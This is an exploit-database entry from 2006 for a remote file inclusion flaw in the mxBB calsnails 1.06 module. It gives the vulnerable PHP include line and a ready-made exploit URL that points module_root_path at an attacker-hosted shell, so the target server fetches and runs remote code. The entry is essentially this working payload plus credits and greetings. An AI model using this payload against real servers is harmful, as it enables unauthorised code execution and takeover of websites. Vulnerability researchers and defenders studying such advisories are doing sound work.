mxBB Module calsnails 1.06 - 'mx_common.php' File Inclusion

EDB-ID:

2799


Author:

bd0rk

Type:

webapps


Platform:

PHP

Date:

2006-11-17


##################################################################
#                                                                #
# mxBB calsnails module 1.06 Remote File Inclusion Vulnerability #
#                                                                #
# Bugfounder: bd0rk || SOH-Crew                                  #
#                                                                #
# Website: www.soh-crew.it.tt                                    #
#                                                                #
# Gr33tings: nukedx, DeeJay, TheJT, str0ke                       #
#                                                                #
##################################################################

Mod-Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=21

Vulnerable Code: include_once($module_root_path . 'includes/cal_settings.'.$phpEx);

[+]Exploit: http://[site]/[path]/includes/mx_common.php?module_root_path=http://Y0urSh3LL?

# milw0rm.com [2006-11-17]